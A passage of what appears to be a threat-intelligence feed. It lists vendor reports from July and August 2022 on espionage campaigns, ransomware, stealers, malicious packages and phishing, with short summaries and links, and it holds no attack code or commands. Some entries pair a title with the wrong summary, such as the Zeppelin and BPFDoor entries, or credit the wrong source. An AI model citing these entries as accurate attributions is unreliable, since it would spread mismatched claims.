- 2022-08-18
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers found a cyber espionage campaign targeting Israeli entities and organizations across various sectors, including government, shipping, energy and healthcare, via social engineering lures and a potential watering hole. The attack has been attributed to UNC3890.
Source:
https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping
—
- Intel Source:
- CheckMarx
- Intel Name:
- Python_s_Top_Packages_attack
- Date of Scan:
- 2022-08-18
- Impact:
- LOW
- Summary:
- Researchers from Checkmarx have detected a large-scale attack on the Python ecosystem with multi-stage persistent malware. A PyPI user account published a dozen malicious typosquatting packages under the names of popular projects with slight permutations.
—
- Intel Source:
- Trustwave
- Intel Name:
- Cyber_Weapons_Used_in_the_Ukraine_Russia_War
- Date of Scan:
- 2022-08-18
- Impact:
- MEDIUM
- Summary:
- Cyberattacks leveraging malware are an important part of modern hybrid war strategy. While conventional warfare is conducted on the battlefield and limited by several factors, cyber warfare continues in cyberspace, offering the chance to infiltrate and damage targets far behind the frontlines.
—
- Intel Source:
- Recorded Future
- Intel Name:
- Diving_deep_into_RedAlphas_cyber_espionage_activity
- Date of Scan:
- 2022-08-17
- Impact:
- LOW
- Summary:
- Researchers from Recorded Future have analyzed multiple campaigns conducted by the Chinese state-sponsored threat activity group RedAlpha. The group very likely sought to gain access to email accounts and other online communications of targeted individuals and organizations.
Source:
https://go.recordedfuture.com/hubfs/reports/ta-2022-0816.pdf
—
- Intel Source:
- Securelist
- Intel Name:
- Surge_in_attack_through_malicious_Browser_Extension
- Date of Scan:
- 2022-08-17
- Impact:
- LOW
- Summary:
- Securelist analysts documented their findings on multiple browser extensions which have been targeting at least 1.31 million users. The most prevalent threat is a family of adware called WebSearch, which masquerades as PDF viewers.
Source:
https://securelist.com/threat-in-your-browser-extensions/107181/
—
- Intel Source:
- Trend Micro
- Intel Name:
- Trend_Micro_Research_on_Cloud_based_Cryptocurrency_mining
- Date of Scan:
- 2022-08-17
- Impact:
- MEDIUM
- Summary:
- Trend Micro’s research document raises concerns about the impact on organizations running cloud instances, noting that potential victims of malicious cryptocurrency mining could be from any country or sector, making cloud-based cryptocurrency-mining attacks a global concern for companies.
—
- Intel Source:
- Cyble
- Intel Name:
- Typhon_Stealer_being_spread_through_Phishing_sites
- Date of Scan:
- 2022-08-16
- Impact:
- LOW
- Summary:
- Cyble researchers analyzed a sample URL which hosts a Windows executable payload. This Windows executable is a variant of the Typhon stealer malware, delivered via a crafted .lnk file.
Source:
https://blog.cyble.com/2022/08/16/phishing-site-used-to-spread-typhon-stealer/
—
- Intel Source:
- Sonatype
- Intel Name:
- PyPI_Package_Drops_Fileless_Cryptominer_to_Linux_Systems
- Date of Scan:
- 2022-08-16
- Impact:
- LOW
- Summary:
- Researchers from Sonatype have identified a PyPI package named ‘secretslib’ whose description reads ‘secrets matching and verification made easy’. On closer inspection, however, the package covertly runs cryptominers on the Linux machine in memory, a technique largely employed by fileless malware and crypters.
Source:
https://blog.sonatype.com/pypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0010_Armageddon_leveraging_GammaLoad_and_GammaSteel_malwares
- Date of Scan:
- 2022-08-16
- Impact:
- LOW
- Summary:
- CERT-UA has tracked an attack since the first half of 2022 in which the distribution of HTM droppers via email leads to the delivery of GammaLoad.PS1 and subsequently GammaSteel.PS1.
—
- Intel Source:
- Microsoft
- Intel Name:
- Phishing_campaign_by_Russian_Threat_Actor_SEABORGIUM
- Date of Scan:
- 2022-08-16
- Impact:
- MEDIUM
- Summary:
- MSTIC disrupted a campaign by SEABORGIUM, a Russia-based threat actor. Its campaigns involve persistent phishing and credential theft leading to intrusions and data theft.
—
- Intel Source:
- Symantec
- Intel Name:
- Russian_hackers_targeting_Ukraine_with_default_Word_template_hijacker
- Date of Scan:
- 2022-08-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have observed campaigns that show phishing messages carrying a self-extracting 7-Zip archive that fetches an XML file from an “xsph.ru” subdomain associated with Gamaredon since May 2022.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm
—
- Intel Source:
- TrendMicro
- Intel Name:
- A_chat_application_MiMi_compromised_by_Iron_Tiger_malware
- Date of Scan:
- 2022-08-15
- Impact:
- MEDIUM
- Summary:
- Researchers from Trend Micro discovered a server hosting the malicious samples used to compromise the chat application MiMi. The sample belongs to the HyperBro malware family used by Iron Tiger, an advanced persistent threat (APT) group that has been performing cyberespionage for almost a decade and is now targeting Windows and macOS.
—
- Intel Source:
- Weixin
- Intel Name:
- The_observation_of_Conti_Group_activity_used_by_Russian_threat_actors
- Date of Scan:
- 2022-08-15
- Impact:
- MEDIUM
- Summary:
- Qi Anxin Threat Intelligence Center has been tracking Russian-speaking threat actors and observed that the Conti Group used Exchange vulnerabilities to target companies labelled “rich”.
—
- Intel Source:
- Cyble
- Intel Name:
- MikuBot_spies_on_Victims_using_hidden_VNC
- Date of Scan:
- 2022-08-15
- Impact:
- MEDIUM
- Summary:
- Researchers at Cyble Research Labs have identified a new malware called ‘MikuBot’, which a threat actor was advertising in cybercrime forums. The bot steals sensitive data and runs hidden VNC sessions that allow threat actors to remotely access the target’s system.
Source:
https://blog.cyble.com/2022/08/11/mikubot-spotted-in-the-wild/
—
- Intel Source:
- TrendMicro
- Intel Name:
- A_new_deployment_of_CopperStealer_s_distributing_malware
- Date of Scan:
- 2022-08-15
- Impact:
- MEDIUM
- Summary:
- Trend Micro publicly shared its analysis of a new development in CopperStealer, which distributes malware by abusing a browser stealer, an adware browser extension, or remote desktop.
—
- Intel Source:
- Morphisec
- Intel Name:
- A_new_upgrade_on_the_activity_of_APT_C_35_or_DoNot_Team
- Date of Scan:
- 2022-08-12
- Impact:
- MEDIUM
- Summary:
- Researchers at Morphisec Labs have monitored the activity of DoNot Team/APT-C-35, noting that the group has added a new module to its Windows framework.
Source:
https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed
—
- Intel Source:
- Cyble
- Intel Name:
- Onyx_Ransomware_s_Recent_Operations
- Date of Scan:
- 2022-08-12
- Impact:
- LOW
- Summary:
- Cyble researchers found an updated Onyx ransomware which is based on Chaos ransomware and that ransomware renamed its leak site from “ONYX NEWS” to “VSOP NEWS.”
Source:
https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/
—
- Intel Source:
- ASEC
- Intel Name:
- A_distribution_of_Monero_CoinMiner_by_Webhards
- Date of Scan:
- 2022-08-12
- Impact:
- LOW
- Summary:
- The ASEC analysis team has discovered that Monero CoinMiner, also known as XMRig, is being distributed via file-sharing websites such as Korean webhards and torrents.
—
- Intel Source:
- CISA
- Intel Name:
- Zeppelin_Ransomware
- Date of Scan:
- 2022-08-12
- Impact:
- MEDIUM
- Summary:
- Cyble researchers found an updated Onyx ransomware which is based on Chaos ransomware and that ransomware renamed its leak site from “ONYX NEWS” to “VSOP NEWS.”
—
- Intel Source:
- Bitsight
- Intel Name:
- Emotet_re-introduction_SMB_spreader_module
- Date of Scan:
- 2022-08-11
- Impact:
- LOW
- Summary:
- Researchers at Bitsight have observed the Emotet botnet’s Epoch4 version delivering a new module to infected systems that turned out to be a credit card stealer targeting Google Chrome. Later, they found that Emotet Epoch4 also re-introduced the SMB spreader module.
Source:
https://www.bitsight.com/blog/emotet-smb-spreader-back
—
- Intel Source:
- Palo Alto
- Intel Name:
- BlueSky_Ransomware_targets_Windows_hosts_and_utilizes_multithreading
- Date of Scan:
- 2022-08-11
- Impact:
- MEDIUM
- Summary:
- Researchers at Palo Alto have analysed code samples of BlueSky ransomware, which they found to be connected with the Conti ransomware group. BlueSky’s multithreaded structure shows code similarities with Conti v3. Moreover, BlueSky’s file-encryption algorithm also closely resembles that of Babuk ransomware.
Source:
https://unit42.paloaltonetworks.com/bluesky-ransomware/
—
- Intel Source:
- Zscaler
- Intel Name:
- AiTM_attack_targets_Gmail_Enterprise_users
- Date of Scan:
- 2022-08-11
- Impact:
- MEDIUM
- Summary:
- Zscaler researchers followed up on their earlier findings about an AiTM phishing campaign against Microsoft email services and found that the same campaign has been targeting enterprise users of Gmail.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Yanluowang ransomware gang targets Cisco
- Date of Scan:
- 2022-08-11
- Impact:
- MEDIUM
- Summary:
- Cisco Talos has analyzed a recent attack on Cisco by Yanluowang ransomware group which breached its corporate network in late May. The attackers could only harvest and steal non-sensitive data from a Box folder linked to a compromised employee’s account.
Source:
https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html
—
- Intel Source:
- Cisco
- Intel Name:
- Raspberry_Robin_tries_to_remain_undetected
- Date of Scan:
- 2022-08-11
- Impact:
- MEDIUM
- Summary:
- Researchers at Cisco have analysed a distinctive pattern of msiexec.exe usage across different endpoints. As they drilled down to individual assets, they found traces of Raspberry Robin malware.
Source:
https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks
—
- Intel Source:
- Palo Alto
- Intel Name:
- Tropical_Scorpius_deploys_ROMCOM_RAT_in_Cuba_Ransomware_operations
- Date of Scan:
- 2022-08-11
- Impact:
- MEDIUM
- Summary:
- A threat actor dubbed Tropical Scorpius by Palo Alto researchers has changed its TTPs and is also said to be associated with Cuba ransomware operations.
Source:
https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/
—
- Intel Source:
- Securelist
- Intel Name:
- DeathStalker’s_VileRAT_continue_target_Foreign_and_Crypto_Exchanges
- Date of Scan:
- 2022-08-11
- Impact:
- MEDIUM
- Summary:
- Securelist has shared that the threat actor known as DeathStalker has continued to target and disrupt foreign and cryptocurrency exchanges around the world throughout 2022 using the VileRAT malware. Since late 2021 the infection technique has changed slightly, but the initial infection vector is still a malicious message sent to targets via email. In July 2022, Securelist also noticed that the attackers leveraged chatbots embedded in targeted companies’ public websites to send malicious DOCX files to their targets.
Source:
https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/
—
- Intel Source:
- Securelist
- Intel Name:
- Korean_speaking_APT_deploys_DTrack_and_Maui_Ransomware
- Date of Scan:
- 2022-08-10
- Impact:
- MEDIUM
- Summary:
- Researchers from Securelist were able to attribute the Maui ransomware attack to a Korean-speaking APT group called Andariel. They also found that, before deploying the ransomware, the group deployed a variant of the DTrack malware.
Source:
https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/
—
- Intel Source:
- Fortinet
- Intel Name:
- SmokeLoader_malware_drops_zgRAT_by_exploiting_old_flaws
- Date of Scan:
- 2022-08-10
- Impact:
- MEDIUM
- Summary:
- Researchers at FortiGuard Labs have analysed a recent instance of SmokeLoader in which the malware exploits the five-year-old CVE-2017-0199 and CVE-2017-11882. This sample drops zgRAT, a payload rarely seen in previous SmokeLoader deliveries.
Source:
https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities?&web_view=true
—
- Intel Source:
- Palo Alto
- Intel Name:
- IcedID_or_Bokbot_infection_led_to_Cobalt_Strike
- Date of Scan:
- 2022-08-10
- Impact:
- MEDIUM
- Summary:
- Securonix Threat Labs has monitored OSINT sources and identified a new infection of IcedID delivering CobaltStrike.
—
- Intel Source:
- Resecurity
- Intel Name:
- LogoKit_returns_leveraging_Open_Redirect_Vulnerabilities
- Date of Scan:
- 2022-08-10
- Impact:
- LOW
- Summary:
- Researchers at Resecurity have discovered threat actors leveraging open redirect vulnerabilities in popular online services and apps to bypass spam filters and ultimately deliver phishing content.
—
- Intel Source:
- Kaspersky
- Intel Name:
- Chinese_APT_group_targets_Asia_and_Eastern_Europe
- Date of Scan:
- 2022-08-09
- Impact:
- MEDIUM
- Summary:
- Kaspersky researchers found a series of attacks targeting organizations in Asia and Eastern Europe. These attacks have been attributed to the Chinese APT group TA428.
—
- Intel Source:
- Walmart
- Intel Name:
- Drilling_down_into_SharpEx_browser_extension_malware
- Date of Scan:
- 2022-08-09
- Impact:
- LOW
- Summary:
- Walmart researchers further analyzed a browser extension dubbed SharpExt used by the North Korean threat actor Kimsuky. The goal of the extension is to steal emails and attachments from victims.
—
- Intel Source:
- DFIR Report
- Intel Name:
- BumbleBee_malware_found_its_way_to_Domain_Admin
- Date of Scan:
- 2022-08-09
- Impact:
- MEDIUM
- Summary:
- DFIR Report researchers analyzed an intrusion which involved BumbleBee as the initial access vector. The intrusion began with a password protected zipped ISO file.
Source:
https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/
—
- Intel Source:
- Netlab 360
- Intel Name:
- Orchard_Botnet_used_to_generate_malicious_domains
- Date of Scan:
- 2022-08-09
- Impact:
- LOW
- Summary:
- Researchers from Qihoo 360’s Netlab security team came across a new botnet named Orchard which was using Bitcoin creator Satoshi Nakamoto’s account transaction information to generate malicious domain names to conceal its command-and-control (C2) infrastructure.
—
- Intel Source:
- PTSecurity
- Intel Name:
- APT31_targets_Russian_companies
- Date of Scan:
- 2022-08-08
- Impact:
- MEDIUM
- Summary:
- PT Expert Security Center analysts found an attack targeting Russian media and energy companies. These attacks have been attributed to APT31.
Source:
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/
—
- Intel Source:
- Meta
- Intel Name:
- Two_cyber_espionage_operations_by_Bitter_APT_and_APT36
- Date of Scan:
- 2022-08-08
- Impact:
- MEDIUM
- Summary:
- Researchers at Meta have published a quarterly threat report in which they took action on two cyber espionage operations in South Asia, linked to Bitter APT and APT36 respectively. The researchers also shared new and noteworthy TTPs for both actors.
Source:
https://about.fb.com/wp-content/uploads/2022/08/Quarterly-Adversarial-Threat-Report-Q2-2022.pdf
—
- Intel Source:
- Crowdstrike
- Intel Name:
- Four_CATAPULT_SPIDER_Challenges
- Date of Scan:
- 2022-08-08
- Impact:
- LOW
- Summary:
- CrowdStrike has published a blog describing the intended approach to solving the challenges of the eCrime track. Participants in the Adversary Quest analyzed new activity by CATAPULT SPIDER.
Source:
https://www.crowdstrike.com/blog/catapult-spider-adversary-quest-walkthrough-2022/
—
- Intel Source:
- ReversingLabs
- Intel Name:
- GwisinLocker_Ransomware_Targets_Linux_Based_Systems
- Date of Scan:
- 2022-08-08
- Impact:
- LOW
- Summary:
- A new ransomware family called ‘GwisinLocker’ has emerged targeting South Korean healthcare, industrial, and pharmaceutical companies with Windows and Linux encryptors.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Bumblebee_malware_activity_distributed_through_Projector_Libra
- Date of Scan:
- 2022-08-05
- Impact:
- MEDIUM
- Summary:
- Researchers from Palo Alto have identified Bumblebee malware being distributed through Projector Libra, a criminal group that uses file-sharing services to distribute malware after direct email correspondence with a potential victim.
Source:
https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/
—
- Intel Source:
- Fortinet
- Intel Name:
- A_new_IoT_malware_family_called_RapperBot
- Date of Scan:
- 2022-08-05
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs has identified a new family of IoT malware that uses code derived from Mirai to gain access to SSH servers and to maintain persistence on a victim device after it has been removed.
Source:
https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery
—
- Intel Source:
- Deepwatch
- Intel Name:
- Threat_Actor_leverages_Confluence_Bug_to_Deploy_Ljl_Backdoor
- Date of Scan:
- 2022-08-05
- Impact:
- MEDIUM
- Summary:
- A novel backdoor called Ljl was discovered by the Deepwatch Adversary Tactics and Intelligence Team. “The evidence indicates that the threat actor executed malicious commands with a parent process of tomcat9.exe in Atlassian’s Confluence directory,” the company said. “After the initial compromise, the threat actor ran various commands to enumerate the local system, network, and Active Directory environment.”
Source:
https://cdn1.hubspot.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/eBooks/Deepwatch%20Incident%20Intel%20Report%20-%20Novel%20Backdoor%20Discovered%20-%20Aug%202022.pdf
https://5556002.fs1.hubspotusercontent-na1.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/Reports/ljlBackdoor%20Analysis.pdf
—
- Intel Source:
- Cyble
- Intel Name:
- LOLI_Stealer_A_new_Golang_Based_InfoStealer
- Date of Scan:
- 2022-08-04
- Impact:
- LOW
- Summary:
- Cyble researchers came across a new Golang-based infostealer dubbed LOLI Stealer. This stealer was being sold via a MaaS model.
Source:
https://blog.cyble.com/2022/08/03/loli-stealer-golang-based-infostealer-spotted-in-the-wild/
—
- Intel Source:
- VirusTotal
- Intel Name:
- Malware_disguised_as_Legitimate_Software
- Date of Scan:
- 2022-08-04
- Impact:
- LOW
- Summary:
- Researchers from VirusTotal have analyzed malware samples and found 1,816 samples since January 2020 that masqueraded as legitimate software by packaging the malware in installers for other popular software such as Google Chrome, Malwarebytes, Zoom, Brave, Mozilla Firefox, and Proton VPN.
Source:
https://blog.virustotal.com/2022/08/deception-at-scale.html
—
- Intel Source:
- ASEC
- Intel Name:
- A_distribution_of_malicious_Word_files_with_North_Korea_related_materials
- Date of Scan:
- 2022-08-04
- Impact:
- LOW
- Summary:
- The ASEC analysis team has discovered another distribution of malicious Word files with North Korea-related materials. The malicious Word files are distributed under various names, most likely via email, alongside a file related to a specific webinar, and access the C2 through mshta.
—
- Intel Source:
- Mandiant
- Intel Name:
- New_campaign_by_Iranian_Threat_Actor
- Date of Scan:
- 2022-08-04
- Impact:
- MEDIUM
- Summary:
- Researchers from Mandiant identified a politically motivated disruptive attack against Albanian government organizations. The researchers also noted the use of the ROADSWEEP ransomware and the CHIMNEYSWEEP backdoor.
—
- Intel Source:
- Cloudsek
- Intel Name:
- Deep_Analysis_of_Bumblebee_Malware
- Date of Scan:
- 2022-08-04
- Impact:
- LOW
- Summary:
- Researchers from CloudSEK performed a deep analysis of the Bumblebee malware loader, in which adversaries push ISO files through compromised email chains, known as thread-hijacked emails, to deploy the loader.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Malware_campaigns_leveraging_”Dark Utilities”_platform
- Date of Scan:
- 2022-08-04
- Impact:
- LOW
- Summary:
- Researchers at Cisco Talos have identified a C2-as-a-service (C2aaS) platform known as “Dark Utilities” offering a variety of services such as remote system access, DDoS capabilities and cryptocurrency mining. The payloads provided by the platform support Windows, Linux and Python-based implementations.
Source:
https://blog.talosintelligence.com/2022/08/dark-utilities.html
—
- Intel Source:
- MalwareBytes
- Intel Name:
- Russian_organizations_attacked_with_new_Woody_RAT_malware
- Date of Scan:
- 2022-08-04
- Impact:
- LOW
- Summary:
- Researchers from the Malwarebytes Threat Intelligence team have identified a new Remote Access Trojan called Woody Rat that allows attackers to remotely control and steal information from compromised devices.
—
- Intel Source:
- Walmart
- Intel Name:
- IcedID_leveraging_PrivateLoader
- Date of Scan:
- 2022-08-04
- Impact:
- LOW
- Summary:
- Researchers from Walmart have analysed PrivateLoader, which continues to function as an effective loading service and has recently been leveraging SmokeLoader for its loads.
Source:
https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f
—
- Intel Source:
- IronNet
- Intel Name:
- Robin_Banks_PhaaS_Targeting_Citibank_Customers
- Date of Scan:
- 2022-08-03
- Impact:
- LOW
- Summary:
- Researchers from IronNet have identified the Phishing-as-a-Service platform Robin Banks selling ready-to-use phishing kits to cybercriminals. The kits are used to obtain financial details of victims living in the U.S., the U.K., Canada, and Australia.
Source:
https://www.ironnet.com/blog/robin-banks-a-new-phishing-as-a-service-platform
—
- Intel Source:
- Cyble
- Intel Name:
- Mars_Stealer_distributing_via_fake_wallet_site
- Date of Scan:
- 2022-08-02
- Impact:
- LOW
- Summary:
- Through their research, Cyble Research Labs discovered that the threat actors behind Mars Stealer are adopting sophisticated phishing attacks to distribute the stealer and gather user credentials, system information, and other sensitive data.
Source:
https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Manjusaka_Offensive_Framework
- Date of Scan:
- 2022-08-02
- Impact:
- MEDIUM
- Summary:
- Researchers at Cisco Talos have discovered a new attack framework called Manjusaka. This framework is advertised as a reproduction of the Cobalt Strike framework. Its implants are written in Rust for Windows and Linux.
Source:
https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html
—
- Intel Source:
- Trendmicro
- Intel Name:
- An_updated_variant_of_SolidBit_ransomware_new_targets
- Date of Scan:
- 2022-08-02
- Impact:
- LOW
- Summary:
- Trend Micro published a technical analysis of a new SolidBit variant that poses as different applications to lure gamers and social media users. SolidBit is suspected of being a LockBit ransomware copycat. The group also appears to be planning to expand its operations through these fraudulent apps and its recruitment of ransomware-as-a-service affiliates.
Source:
https://www.trendmicro.com/en_us/research/22/h/solidbit-ransomware-enters-the-raas-scene-and-takes-aim-at-gamer.html
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/solidbit-ransomware-enters-the-raas-scene-and-takes-aim-at-gamers-and-social-media-users-with-new-variant-/IOCs-SolidBit-Ransomware-Enters-the-RaaS-Scene-and-Takes-Aim-at-Gamers-and-Social-Media-Users-With-New-Variant%20.txt
—
- Intel Source:
- EclecticIQ
- Intel Name:
- Emotet_Downloader_Leveraging_Regsvr32_tool
- Date of Scan:
- 2022-08-02
- Impact:
- LOW
- Summary:
- Researchers from EclecticIQ have observed an Emotet downloader document using the Regsvr32 tool for execution.
Source:
https://blog.eclecticiq.com/emotet-downloader-document-uses-regsvr32-for-execution
—
- Intel Source:
- SentinelOne
- Intel Name:
- LockBit_Ransomware_Leveraging_Windows Defender_to_load_Cobalt_Strike_Payload
- Date of Scan:
- 2022-08-02
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelOne have recently investigated LockBit ransomware and found that the threat actor is abusing the Windows Defender command line tool MpCmdRun.exe to decrypt and load Cobalt Strike payloads.
—
- Intel Source:
- Zscaler
- Intel Name:
- Analysis_on_Industrial_Spy_Ransomware
- Date of Scan:
- 2022-08-02
- Impact:
- MEDIUM
- Summary:
- Zscaler published a technical analysis of the Industrial Spy ransomware group, which emerged in April 2022 by ransoming stolen data and has more recently combined these attacks with ransomware. The group exfiltrates and sells data on its dark web marketplace but does not always encrypt a victim’s files. It uses a combination of RSA and 3DES to encrypt files.
—
- Intel Source:
- Security Scorecard
- Intel Name:
- A_Deep_Dive_Analysis_of_RedLine_Stealer_Malware
- Date of Scan:
- 2022-08-02
- Impact:
- LOW
- Summary:
- Researchers have recently performed an in-depth investigation of RedLine Stealer, which is being distributed via cracked games, applications, and services.
Source:
https://securityscorecard.com/research/detailed-analysis-redline-stealer
—
- Intel Source:
- Cofense
- Intel Name:
- Attackers_Leveraging_New_Phishing_Techniques
- Date of Scan:
- 2022-08-01
- Impact:
- LOW
- Summary:
- Researchers from the Cofense Phishing Defense Center have observed a huge variety of phishing techniques. Some of these techniques are quite unique in how they get the end user to interact with the message.
Source:
https://cofense.com/blog/countdown-timer-ransomware-themed-phishing-attack
—
- Intel Source:
- SpiderLabs
- Intel Name:
- Phishing_Attacks_Increase_Using_Decentralized_IPFS_Network
- Date of Scan:
- 2022-08-01
- Impact:
- LOW
- Summary:
- Researchers from SpiderLabs have identified that the decentralized file system ‘IPFS’ is becoming the new place for hosting phishing sites. They also identified no fewer than 3,000 emails containing IPFS phishing URLs as an attack vector in the last three months.
Source:
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ipfs-the-new-hotbed-of-phishing/
—
- Intel Source:
- Securelist
- Intel Name:
- A new_malicious_campaign_LofyLife
- Date of Scan:
- 2022-08-01
- Impact:
- LOW
- Summary:
- Kaspersky has discovered a new threat in an open-source software repository: “LofyLife”, a malicious campaign to steal tokens and bank card data.
Source:
https://securelist.com/lofylife-malicious-npm-packages/107014/
—
- Intel Source:
- Qualys
- Intel Name:
- Multiple_APT_Groups_Leveraging_Quasar_RAT
- Date of Scan:
- 2022-08-01
- Impact:
- MEDIUM
- Summary:
- Researchers from Qualys have analyzed the Quasar RAT which is widely leveraged by multiple threat actor groups targeting government and private organizations in Southeast Asia and other geographies.
—
- Intel Source:
- Inquest
- Intel Name:
- Green_Stone_sample_attributed_to_Iran
- Date of Scan:
- 2022-08-01
- Impact:
- LOW
- Summary:
- Inquest discovered a malicious sample that was uploaded from Iran. The document is a contract for the supply of services to an energy company from southern Iran, «Tavangoostar Niro va Gashtavar Jonob», and also contains a link to this energy company, www.tavangyl.com. Analysts named the family Green Stone, since this family of malicious documents containing executable files was not previously known.
—
- Intel Source:
- Trustwave
- Intel Name:
- An_increasing_number_of_phishing_emails_containing_IPFS_URLs
- Date of Scan:
- 2022-08-01
- Impact:
- LOW
- Summary:
- Trustwave noticed an increasing number of phishing emails containing IPFS URLs as their payload. They have observed more than 3,000 emails containing phishing URLs that utilized IPFS over the past 90 days, and it is evident that IPFS is increasingly becoming a popular platform for phishing websites.
Source:
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ipfs-the-new-hotbed-of-phishing/
—
- Intel Source:
- Qualys
- Intel Name:
- Diving_Deep_into_BPFDoor_Malware
- Date of Scan:
- 2022-08-01
- Impact:
- LOW
- Summary:
- Researchers from the Cofense Phishing Defense Center have observed a huge variety of phishing techniques. Some of these techniques are quite unique in how they get the end user to interact with the message.
—
- Intel Source:
- Sucuri
- Intel Name:
- WebAssembly_frequently_used_for_cryptomining
- Date of Scan:
- 2022-07-29
- Impact:
- LOW
- Summary:
- Sucuri was recently contacted by a client who noticed that their computer slowed to a crawl every time they navigated to their own WordPress website. A cursory review of the site files revealed a snippet of code injected into one of the theme files.
Source:
https://blog.sucuri.net/2022/07/cryptominers-webassembly-in-website-malware.html
—
- Intel Source:
- Cybergeeks
- Intel Name:
- Analysis_on_Symbiote_Malware
- Date of Scan:
- 2022-07-29
- Impact:
- LOW
- Summary:
- The malware’s purpose is to steal credentials from the SSH and SCP processes by hooking the libc read function.
Source:
https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/
—
- Intel Source:
- ReversingLabs
- Intel Name:
- The_newly_discovered_Follina_exploit_used_by_attackers_again
- Date of Scan:
- 2022-07-29
- Impact:
- MEDIUM
- Summary:
- ReversingLabs analyzed three malicious payloads circulating online that have been linked to use of the newly discovered Follina exploit in Microsoft’s Support Diagnostic Tool (MSDT).
Source:
https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks
—
- Intel Source:
- Inquest
- Intel Name:
- An_Excel_Infection_Chain
- Date of Scan:
- 2022-07-29
- Impact:
- LOW
- Summary:
- Inquest researchers discovered that the threat actor tempts the user into enabling content in Excel in order to run whatever surprise they have hidden inside.
Source:
https://inquest.net/blog/2022/07/25/convoluted-infection-chain-using-excel
—
- Intel Source:
- Volexity
- Intel Name:
- North_Korean_threat_actor_SharpTongue
- Date of Scan:
- 2022-07-29
- Impact:
- LOW
- Summary:
- Volexity discovered new mail-theft malware, “SHARPEXT”, believed to have been used by the threat actor SharpTongue. This actor is believed to be North Korean in origin and is often publicly referred to under the name Kimsuky.
—
- Intel Source:
- Cyble, SocInvestigations
- Intel Name:
- Threat_Actors_leveraging_Microsoft_Applications_via_DLL_SideLoading
- Date of Scan:
- 2022-07-28
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyble and SOCInvestigation have identified the DLL (Dynamic-Link Library) sideloading technique leveraged by Threat Actors to spread payloads to users using legitimate applications which load malicious DLL files that spoof legitimate ones.
Source:
https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/
https://www.socinvestigation.com/threat-actors-leveraging-microsoft-applications-via-dll-sideloading-detection-response/
—
- Intel Source:
- ASEC
- Intel Name:
- A_Korean_Web_Portal_Page_Daum_using_for_Spreading_Phishing_Emails
- Date of Scan:
- 2022-07-28
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered the distribution of phishing emails impersonating a Korean web portal page (Daum), in which attackers use attachments to redirect the user to a phishing webpage.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Gootkit_Loaders_Updated_TTPs_of_Cobalt_Strike
- Date of Scan:
- 2022-07-28
- Impact:
- LOW
- Summary:
- Researchers from Trend Micro have identified the new tactics of Gootkit Loader. It uses fileless techniques to drop Cobalt Strike and other malicious payloads.
—
- Intel Source:
- Microsoft
- Intel Name:
- KnotWeed_targets_UK_Austria_with_SubZero_malware
- Date of Scan:
- 2022-07-28
- Impact:
- MEDIUM
- Summary:
- MSTIC identified an Austria-based private-sector threat actor, dubbed KnotWeed, that has been targeting law firms, banks, and strategic consultancies in Austria, the United Kingdom, and Panama with SubZero malware.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Analysis_of_SSH_Honeypot_Data_with_PowerBI
- Date of Scan:
- 2022-07-27
- Impact:
- LOW
- Summary:
- The researcher from ISC SANS provides some analysis of SSH honeypot data after experimenting for a while with Microsoft PowerBI, using honeypot data parsed into comma-delimited (CSV) format.
—
- Intel Source:
- Esentire
- Intel Name:
- Gootloader_expands_its_payload_to_deliver_IcedID_malware
- Date of Scan:
- 2022-07-27
- Impact:
- LOW
- Summary:
- eSentire’s Threat Response Unit (TRU) team has recently observed multiple Gootloader infections. One notable Gootloader incident delivered an IcedID loader. The malware targets domain joined machines. The infection starts with the user visiting the infected website with a lure to download a ZIP file.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-gootloader-and-icedid
—
- Intel Source:
- Microsoft
- Intel Name:
- IIS_extensions_persistently_used_as_Exchange_backdoors
- Date of Scan:
- 2022-07-27
- Impact:
- LOW
- Summary:
- Microsoft says attackers increasingly use malicious Internet Information Services (IIS) web server extensions to backdoor unpatched Exchange servers as they have lower detection rates compared to web shells.
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0010_Group_leveraging_GammaLoad_PS1_v2_malware_to_target_Ukraine
- Date of Scan:
- 2022-07-27
- Impact:
- LOW
- Summary:
